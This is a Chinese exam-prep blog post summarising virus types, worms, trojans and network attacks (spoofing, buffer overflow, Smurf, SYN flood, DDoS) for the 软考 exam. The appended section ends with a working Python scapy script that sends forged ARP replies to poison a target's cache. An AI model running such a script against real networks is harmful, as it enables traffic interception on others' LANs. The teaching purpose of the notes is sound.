软考总结之网络+病毒攻击类型

本文详细介绍了计算机病毒的不同类型及特性,包括寄生方式和破坏性的分类;恶意代码的种类如蠕虫和木马的特点及传播途径;网络攻击的方式如木马、漏洞入侵、协议欺骗等,以及常见的拒绝服务攻击类型。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

主要总结知识点:

1、病毒,恶意代码

2、网络攻击方式

3、几种加密体制

 

一、病毒

1、寄生方式分类:

类型

特点

引导型

寄生在磁盘引导区或主引导区的计算机病毒

如:主引导区:大麻病毒,2708病毒,火炬等

分区:小球病毒,Girl病毒

文件型

寄生在文件中的

如:1575/1591病毒、848病毒感染.comExe可执行文件

Macro/ConceptMacro/Atoms等宏病毒感染.doc文件

复合型

具有引导型和文件型两种寄生方式的病毒

攻击性很强

如:Flip病毒、新世纪病毒、One-half病毒等

 

2、破坏性分类:

类型

特点

良性

只为了表现自身,并不彻底破坏系统和数据,但会占用CPU时间,增加系统开销,降低系统工作效率

如:小球病毒,1575/1591病毒,救护车病毒,扬基病毒

利用其特点可进行宣传自己的政治观点和主张

恶性

一旦发作后,破坏系统和数据

如:黑色星期五,火炬,米开朗.基罗

 

二、恶意代码

类型

特点

蠕虫

自我包含的程序集,能够传播自身的功能或拷贝自身的片段到其他的计算机系统。

不需要把自身附加在宿主计算机上,而是一个独立的程序,能够主动运行

 

分两种:

1、宿主计算机蠕虫:使用网络连接复制自身到其他计算机上

2、网络蠕虫:多个部分,分别在不同的计算机上,使用网络通信

木马

特洛伊木马的简称:通常寄生在用户计算机系统中,盗用用户信息,通过网络发给黑客。与病毒不同处是木马没有自我复制功能的恶意程序

传播途径:

1、电子邮件:附件形式

2、软件下载:捆绑

3、通过会话软件:文件传送功能

 

 

 

三、网络攻击

1、木马

C/S结构的程序,运行在黑客计算机上的Client,运行在目标计算机上的Server,当目标计算机连上Internet后,Client端会发给Server端信息,然后听后黑客指令,执行黑客指令

2、漏洞入侵

黑客利用网络系统的黑洞,采用针对该漏洞的工具或资金设计的针对该漏洞的工具等方式进行入侵、攻击

如:Unicode漏洞入侵,跨站脚本入侵,SQL注入入侵

3、协议欺骗攻击

针对网络协议的缺陷,采用某种欺骗手段,假冒身份以截获信息或获得特权的攻击方式

1IP欺骗:伪造某台主机的IP地址片区特权

2ARP欺骗攻击:利用ARP协议漏洞,伪造IP地址和MAC地址实现ARP欺骗攻击

3DNS欺骗:使用户解析DNS服务器进行域名解析时获得一个错误的IP地址,从而可将用户引导到错误的Internet站点,或者发送一个电子邮件到一个未经授权的邮件服务器等。

4、源路由欺骗:通过制定路由,以假冒身份与其他主机进行合法通信或发送假报文,使受攻击主机出现错误动作。

4、口令入侵

使用某些合法用户的账号及其口令登录到目的主机,然后再实施攻击

5、缓冲区溢出漏洞攻击

程序运行时在计算机中的得到的一段连续内存,它保持着特定类型的数据。可造成程序的运行失败、系统崩溃等后果,可利用它得到系统的控制权进行各种非法操作

6拒绝服务攻击:

通过发送大量合法的请求来消耗和占用过多的服务资源,使得网络服务不能响应正常的请求。

常见的DOS攻击:

1Smurf:冒充受害者的IP,向一个大的网络发送echo request的定向广播包,此网络的许多主机都做出回应,受害主机会受到大量的echo reply消息

2SYN Flooding :利用TCP三次握手,攻击者主机采用无效的IP地址,与受害者主机进行TCP三次握手

3、分布式拒绝服务DDos:攻破多个系统,并利用这些系统去集中攻击其他目标。

4ping of death:构造出重组缓冲区大小的异常的ICMP包进行攻击

5Land攻击:向某个设备发送数据包,并将数据包的源IP地址和目的IP地址都设置成攻击目标的地址。

6Teardrop:利用OS处理分片重叠报文的漏洞进行攻击



以上是软考中有关网络和病毒攻击的知识点。


### 中常见的网络攻击类型网络攻防领域,理解不同类型网络攻击对于准备至关重要。以下是几种在试中经常提及的典型网络攻击: #### 1. 信息泄露攻击 这种攻击旨在未经授权的情况下获取敏感数据或个人信息。攻击者可能利用件漏洞、弱密码或其他配置错误来访问受保护的信息资源[^1]。 #### 2. 完整性破坏攻击 此类攻击的目标是对目标系统的文件或数据库中的数据进行篡改,从而改变其原始状态。这可能导致应用程序行为异常或是误导决策制定者基于不准确的数据做出判断。 #### 3. 拒绝服务(DoS)及分布式拒绝服务(DDoS)攻击 当提到影响可用性的攻击时,通常指的是DoS/DDoS攻击。这些攻击试图通过发送大量请求给服务器使其过载而无法正常提供服务,进而阻止合法用户的正常使用。 #### 4. 非法使用攻击 也称为未授权访问攻击,在这类场景下,黑客会尝试绕过身份验证机制获得对系统内部功能或特权操作权限的不当控制权。一旦成功入侵,他们可以执行恶意命令甚至安装额外的恶意程序。 #### 5. ARP欺骗(ARP Spoofing) 具体到协议层面的技术实现上,像ARP欺骗这样的技术被用来干扰局域内的主机间通信过程。它的作原理是向受害者的计算机发送虚假的地址映射消息,使得受害者误以为某个特定IP对应的MAC属于攻击者而非真正的路由器或其它节点,最终造成流量重定向至攻击者手中并引发潜在的安全风险[^3]。 ```python # 示例:模拟简单的ARP欺骗脚本 (仅用于教育目的) import os from scapy.all import * def get_mac(ip): arp_request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip) answered_list = srp(arp_request, timeout=1, verbose=False)[0] return answered_list[0][1].hwsrc if answered_list else None target_ip = "192.168.1.10" gateway_ip = "192.168.1.1" target_mac = get_mac(target_ip) if target_mac: packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip) send(packet, count=4, verbose=False) else: print("未能找到目标MAC地址") ```
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值